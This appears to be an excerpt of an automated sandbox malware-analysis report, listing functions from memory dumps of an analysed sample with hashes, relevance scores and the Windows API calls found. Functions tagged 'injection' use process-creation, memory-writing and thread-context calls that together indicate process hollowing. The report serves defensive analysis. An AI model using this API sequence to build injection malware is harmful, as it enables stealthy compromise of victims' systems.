                                                                                                                • Instruction Fuzzy Hash: BB1102B59006199FDB20DF99C885BDEBBF4BF48324F24841AD459A7710D778A944CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A29A70, Relevance: .9, Instructions: 906COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: efcfb0e115a1070fe0ea0a6e0b3e7b437b0d7d51127ebb4817b2f3384f8723d6
                                                                                                                • Instruction ID: 2776d5623097974683ad21b7b95fa8c35a46e1cc1fed5fd063dfbbeadc6a5c9f
                                                                                                                • Opcode Fuzzy Hash: efcfb0e115a1070fe0ea0a6e0b3e7b437b0d7d51127ebb4817b2f3384f8723d6
                                                                                                                • Instruction Fuzzy Hash: 13824A30A00629CFCB24CF68C584BAEBBF2BF88716F158559E4499B6A1D734FD41CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D1C450, Relevance: .5, Instructions: 524COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bdf6934cbd5c27c1d3f8acbd467d0233843f1a9ce0bec20727119f737b198614
                                                                                                                • Instruction ID: 032436c679a2f7e0e11a27580ec0d33ff5e13ced76ca5bb14a48082748aa6773
                                                                                                                • Opcode Fuzzy Hash: bdf6934cbd5c27c1d3f8acbd467d0233843f1a9ce0bec20727119f737b198614
                                                                                                                • Instruction Fuzzy Hash: 875256B1985746CFD710CF24F8882997BB1FB49328FD04A09D1625BBA0D3B46D6ADF84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A29338, Relevance: .5, Instructions: 478COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7e7210b9fa5cef3bb0e1b404d2fbd97173f04b3ff00221fc58e7060b73cd3a49
                                                                                                                • Instruction ID: 1d46694e4fb96d189edccc344e50ae46f20aab08dc579dd94af29152779eef90
                                                                                                                • Opcode Fuzzy Hash: 7e7210b9fa5cef3bb0e1b404d2fbd97173f04b3ff00221fc58e7060b73cd3a49
                                                                                                                • Instruction Fuzzy Hash: BB124B74A00125DFCB24CF69C884FAEBBB2FF88B51F198069E405AB661D731DC46CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A28D40, Relevance: .4, Instructions: 430COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b8c7183e87aabeac0eb4effea8ba43b7fb7a6f79685e8af0595819a91c7f7dd1
                                                                                                                • Instruction ID: 171a6a7ec9715f5764d7d5ec99d758269a97aef336986169300a6e8edb5dc1ac
                                                                                                                • Opcode Fuzzy Hash: b8c7183e87aabeac0eb4effea8ba43b7fb7a6f79685e8af0595819a91c7f7dd1
                                                                                                                • Instruction Fuzzy Hash: 53F18E70B04229DFDB28DF69C854BAEBBB3AF84705F148528E405DB795DF389C428B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D12992, Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 02D12A00
                                                                                                                • GetCurrentThread.KERNEL32 ref: 02D12A3D
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 02D12A7A
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D12AD3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: d545434fac6b9902b30756661e36ee891714554e54ed030c27ef35b859504d73
                                                                                                                • Instruction ID: d00b3ea41a856a4f9a2ab6ec7be9fa97b8dc5705b765a31314107cda1d936ac8
                                                                                                                • Opcode Fuzzy Hash: d545434fac6b9902b30756661e36ee891714554e54ed030c27ef35b859504d73
                                                                                                                • Instruction Fuzzy Hash: A851A7B0A003598FDB14CFA9D548BDEBBF1BF49314F248489E809A77A0C7346844CF65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D129A0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 02D12A00
                                                                                                                • GetCurrentThread.KERNEL32 ref: 02D12A3D
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 02D12A7A
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D12AD3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 1e4b38e80a8eab391ebf943a7f5abb2d696d3601e8e7d522a76a2bd964e107ee
                                                                                                                • Instruction ID: 676745d2472f154f4f03db57baf4bc3e079a931f6f736984d14d9aa9241682e2
                                                                                                                • Opcode Fuzzy Hash: 1e4b38e80a8eab391ebf943a7f5abb2d696d3601e8e7d522a76a2bd964e107ee
                                                                                                                • Instruction Fuzzy Hash: 0F5183B0E002598FEB14CFA9D548BDEBBF0BF88314F208459E809A77A0C734A844CF65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A2EFA0, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08A2F1D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 717ce77d2faf1285681a1973b45a818ffcce53c1dedf018d7a39f850bb70d139
                                                                                                                • Instruction ID: eef72e63550b2c4a31f890fbcdba4018e6fd653bfa03adb638d5bc95f0841aff
                                                                                                                • Opcode Fuzzy Hash: 717ce77d2faf1285681a1973b45a818ffcce53c1dedf018d7a39f850bb70d139
                                                                                                                • Instruction Fuzzy Hash: 4C915A71D00229CFEF24CFA9C881BEEBBB2BF49315F148569D809A7640DB749985CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A2EF9E, Relevance: 1.7, APIs: 1, Instructions: 242processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08A2F1D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: a47aa6932923a5632711301047668353a53bf855ea5865ca8d597e0a040e4ede
                                                                                                                • Instruction ID: 0be92f05c623151ef55897b300819abb5feb2ba247fc371a761e7ea9a8688428
                                                                                                                • Opcode Fuzzy Hash: a47aa6932923a5632711301047668353a53bf855ea5865ca8d597e0a040e4ede
                                                                                                                • Instruction Fuzzy Hash: DA915C71D00229CFEF24CFA8C881BEEBBB2BF49315F148569D819A7640DB749985CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D1BD68, Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 9bd94235461f309bcaad9492f0bb8df7ff40ac20c45ccefa892ac73dab9c5701
                                                                                                                • Instruction ID: bba06334b19be697be0d8c349b86c96af6bac2d9fb6e0e62788377a8e3102ac5
                                                                                                                • Opcode Fuzzy Hash: 9bd94235461f309bcaad9492f0bb8df7ff40ac20c45ccefa892ac73dab9c5701
                                                                                                                • Instruction Fuzzy Hash: D3711570A00B059FDB64DF2AD45075ABBF5BF88218F008A2ED58ADBB40D735E845CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D1DE18, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D1DF2A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: 959a3c54daf4bcf1266155bafb2b39a417c1ae59f3bc4a2cade253e5993119cd
                                                                                                                • Instruction ID: 9c08b81303c27fa06149c1cae254cd45d6a40499136cc0f79404b1322919a741
                                                                                                                • Opcode Fuzzy Hash: 959a3c54daf4bcf1266155bafb2b39a417c1ae59f3bc4a2cade253e5993119cd
                                                                                                                • Instruction Fuzzy Hash: 5341C2B1D00349AFDF14CF99D884ADEBBB6BF48314F24812AE419AB350D7749945CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D1DE17, Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D1DF2A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: 46e5b9ee1830da3386cd9a6c9915abdcb738cab4d7668ddcd2615d64759547a7
                                                                                                                • Instruction ID: 91ced2e6d4c83dc25bbca3a093266f8530e0957b15f13682f476bf2db95ca9d3
                                                                                                                • Opcode Fuzzy Hash: 46e5b9ee1830da3386cd9a6c9915abdcb738cab4d7668ddcd2615d64759547a7
                                                                                                                • Instruction Fuzzy Hash: 8E41C0B1D00309AFDF14CFA9D884ADEBBB6BF48314F24812AE419AB350D7749985CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D1DE0C, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D1DF2A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: f4befa54c429520837e742e539fc4735663a22f7fea93627cf4bc4baab18d580
                                                                                                                • Instruction ID: ed71fa519414eebdc8f1aa3a0a8ba7b4a2d5e3b7835bf6978e432a937cbfd183
                                                                                                                • Opcode Fuzzy Hash: f4befa54c429520837e742e539fc4735663a22f7fea93627cf4bc4baab18d580
                                                                                                                • Instruction Fuzzy Hash: 1F41E2B1D00209EFDF14CF99D884ADEBBB2BF88314F24921AE415AB750D7759985CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D12BC0, Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D12C4F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 6971431691001cb7941921bf7b7d3b25d424ee7006b7cdc365f5f24aefe81123
                                                                                                                • Instruction ID: 326b7cea5a4ea018ef45c9ca6e7a31531fe10c8b2b37a10546b4d6c9be8945bf
                                                                                                                • Opcode Fuzzy Hash: 6971431691001cb7941921bf7b7d3b25d424ee7006b7cdc365f5f24aefe81123
                                                                                                                • Instruction Fuzzy Hash: 963146B5900258AFDB10CFA9D988ADEBFF4FF49320F14805AE854A7710D378A945CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A2E710, Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08A2E7A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: 9a13f802b44f1deb2288ba5ff9f99552d7dace52719eb58386b6bc99084e98ee
                                                                                                                • Instruction ID: 203341f9f99da0ecb4de879310443e9e3fcf81b6bc709b90daca5e64f09f5e90
                                                                                                                • Opcode Fuzzy Hash: 9a13f802b44f1deb2288ba5ff9f99552d7dace52719eb58386b6bc99084e98ee
                                                                                                                • Instruction Fuzzy Hash: 3D2144B69002198FCB10CFA9C8817EEBBF5FF48224F10842AE959A7740C7389954CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A2E718, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08A2E7A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: 2162d3a92343f46b0f1a83211ab9965327e670a7c518db4c8b174389e5cdbf9b
                                                                                                                • Instruction ID: 64cca4628a4e642188673d42ce813c4032f4113b545451eb19002d3cb950e63b
                                                                                                                • Opcode Fuzzy Hash: 2162d3a92343f46b0f1a83211ab9965327e670a7c518db4c8b174389e5cdbf9b
                                                                                                                • Instruction Fuzzy Hash: 372113759003199FDF10CFA9C885BEEBBF5FB48324F10842AE919A7641DB789954CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A2EA01, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 08A2EA88
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: 8027d9bbf6954027501e28aeca8049e02f520f419684d01ec23311a3961d957a
                                                                                                                • Instruction ID: 59e634b39b34f849a7fe5f0fad40386edac4fbd75192b4da5d7c0df074142106
                                                                                                                • Opcode Fuzzy Hash: 8027d9bbf6954027501e28aeca8049e02f520f419684d01ec23311a3961d957a
                                                                                                                • Instruction Fuzzy Hash: FF2123B2D002199FDF10CFA9C980BEEBBF5FF48224F50842AE519A7641C7389955CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A2EA08, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 08A2EA88
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: e35def502db10c95fd8c07f201175394a1bfd1935a33ed34ef6d2a5a5792f689
                                                                                                                • Instruction ID: 24ab802b57c23134f95e6a1e586b8cf57c64fcbe3871582bed6c6c7abbd18bff
                                                                                                                • Opcode Fuzzy Hash: e35def502db10c95fd8c07f201175394a1bfd1935a33ed34ef6d2a5a5792f689
                                                                                                                • Instruction Fuzzy Hash: C72116719003599FDF10CFA9C880BEEBBF5FF48324F508429E519A7640C7389955CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A2D770, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 08A2D7F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ContextThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1591575202-0
                                                                                                                • Opcode ID: 7cd0eded1c1ed27dc3af78a18fee832673bff7675f4ec31e6fecbf80e6febd25
                                                                                                                • Instruction ID: ea4dc439d844a8662754d805582e21637af2038752458586ffa7db21aca06820
                                                                                                                • Opcode Fuzzy Hash: 7cd0eded1c1ed27dc3af78a18fee832673bff7675f4ec31e6fecbf80e6febd25
                                                                                                                • Instruction Fuzzy Hash: 2E2135B5D002198FDB20CFA9C4857EEBBF4AF48228F14842AD559B7B41DB789945CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A2D778, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 08A2D7F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ContextThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1591575202-0
                                                                                                                • Opcode ID: b70de89f8eb0ad025b712e4c780c510546cd8a1f6e895aa9657f9f3bdce9c3b4
                                                                                                                • Instruction ID: 82ba7348b5e5fac9a9db67f349763c56ca2fee222402e431dd690a189d64c8ca
                                                                                                                • Opcode Fuzzy Hash: b70de89f8eb0ad025b712e4c780c510546cd8a1f6e895aa9657f9f3bdce9c3b4
                                                                                                                • Instruction Fuzzy Hash: 04213571D003198FDB10DFAAC4857EEBBF4AF48224F54842AD519A7641CB78A945CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D12BC8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D12C4F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: b67f0f8aa1834993dd2750c6cff4d87ad39075380b244dc06acf08d978fbfbce
                                                                                                                • Instruction ID: d0325509c5203dd080cbb1564d0f17cd1cecc8da189eae6a7b148e540f94346f
                                                                                                                • Opcode Fuzzy Hash: b67f0f8aa1834993dd2750c6cff4d87ad39075380b244dc06acf08d978fbfbce
                                                                                                                • Instruction Fuzzy Hash: 942104B5D00218AFDB10CFA9D984ADEFBF9FB48324F14801AE914A3710D378A944CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D1C1C8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 02D1C23A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 9e0146937cf4894fd666a0ea284ad167f04b888dd401635751405051e578fded
                                                                                                                • Instruction ID: df789e60fb876917a211b897a2a38b87cbe6cddfb175c85d64a489cdb584adc7
                                                                                                                • Opcode Fuzzy Hash: 9e0146937cf4894fd666a0ea284ad167f04b888dd401635751405051e578fded
                                                                                                                • Instruction Fuzzy Hash: 251114B69002099FDB14CF9AD484BDEFBF4EB88724F14841AD419A7700C378A945CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A2E458, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08A2E4C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: c56952e277ed3069d9a71c4b148ea4bb26e84863cdf012c08d3c7189e2b8e4c8
                                                                                                                • Instruction ID: a48fa93831125dd6667a379d8c1f79bd74863968030f8e7e32833d7403ba63b8
                                                                                                                • Opcode Fuzzy Hash: c56952e277ed3069d9a71c4b148ea4bb26e84863cdf012c08d3c7189e2b8e4c8
                                                                                                                • Instruction Fuzzy Hash: 691137719002099FDF10DFA9C844BDFBBF5AF48324F148419D515A7650CB79A954CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D1C1D0, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 02D1C23A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: d2c6e1eb10ebcab76d2ec01e23ae6dbdcfaf30bc3c0b0594bfd9c7791b65e13a
                                                                                                                • Instruction ID: bb4cf65e18d675534e2d434ecd4e2f26d10ddb8f693330e4287d93fcaf646ffa
                                                                                                                • Opcode Fuzzy Hash: d2c6e1eb10ebcab76d2ec01e23ae6dbdcfaf30bc3c0b0594bfd9c7791b65e13a
                                                                                                                • Instruction Fuzzy Hash: 741123B69002099FDB14CF9AD444BDEFBF4AB88724F10842AD415A7700C378A945CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A2E456, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08A2E4C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 419e43ef117cca4fcd986e7ec63fb2e3c1c56f55deeec66749f215fddd7337d2
                                                                                                                • Instruction ID: 959658cee6efc0c4bd7161fb159b5e372e2f083b7366ed1c41e08aa7749b4db4
                                                                                                                • Opcode Fuzzy Hash: 419e43ef117cca4fcd986e7ec63fb2e3c1c56f55deeec66749f215fddd7337d2
                                                                                                                • Instruction Fuzzy Hash: 24116472900208CFDF10CFA9C844BEEBBF5AF48324F14881AD519A7610CB39A954CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D1B1EC, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,02D1BD7B), ref: 02D1BFAE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 349639cc06e044fa762b04b510782177081d636ac1c26746a81fe06890aee9cd
                                                                                                                • Instruction ID: 2485cef47596e9ccea049656918405ce59a1568f97dd21108511ccae8718173e
                                                                                                                • Opcode Fuzzy Hash: 349639cc06e044fa762b04b510782177081d636ac1c26746a81fe06890aee9cd
                                                                                                                • Instruction Fuzzy Hash: 771102B5D046499FDB10CF9AD444BDEFBF4EB88228F10845AD819A7B40C379A945CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D18BB8, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02D18C1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2492992576-0
                                                                                                                • Opcode ID: f565795613cea74da5b4c8a030db8d4a30190d17bb9eb1a36b3a8514bbab39d2
                                                                                                                • Instruction ID: 2936cc126bed09f477b2387c73b05f5bb8e6a361aafcd04f48a17948a8edfbaa
                                                                                                                • Opcode Fuzzy Hash: f565795613cea74da5b4c8a030db8d4a30190d17bb9eb1a36b3a8514bbab39d2
                                                                                                                • Instruction Fuzzy Hash: E7119A71D017988EEB10CF99E1043EABFF4AB09328F548459D494A7741C779AA04CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A2F980, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 90dc8ec33a2c2ce826c753454dc3b4433999c5b7efa9ce7693d5d561ed60b209
                                                                                                                • Instruction ID: bb14732c9d760996a6fa60fb4bb73cc9528506c4028462b65531d958fc9e8ca0
                                                                                                                • Opcode Fuzzy Hash: 90dc8ec33a2c2ce826c753454dc3b4433999c5b7efa9ce7693d5d561ed60b209
                                                                                                                • Instruction Fuzzy Hash: CF113A71D007598FDB20DFAAC4457EFFBF5AB88224F24841AC515A7740CB78A944CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0107D4A0, Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
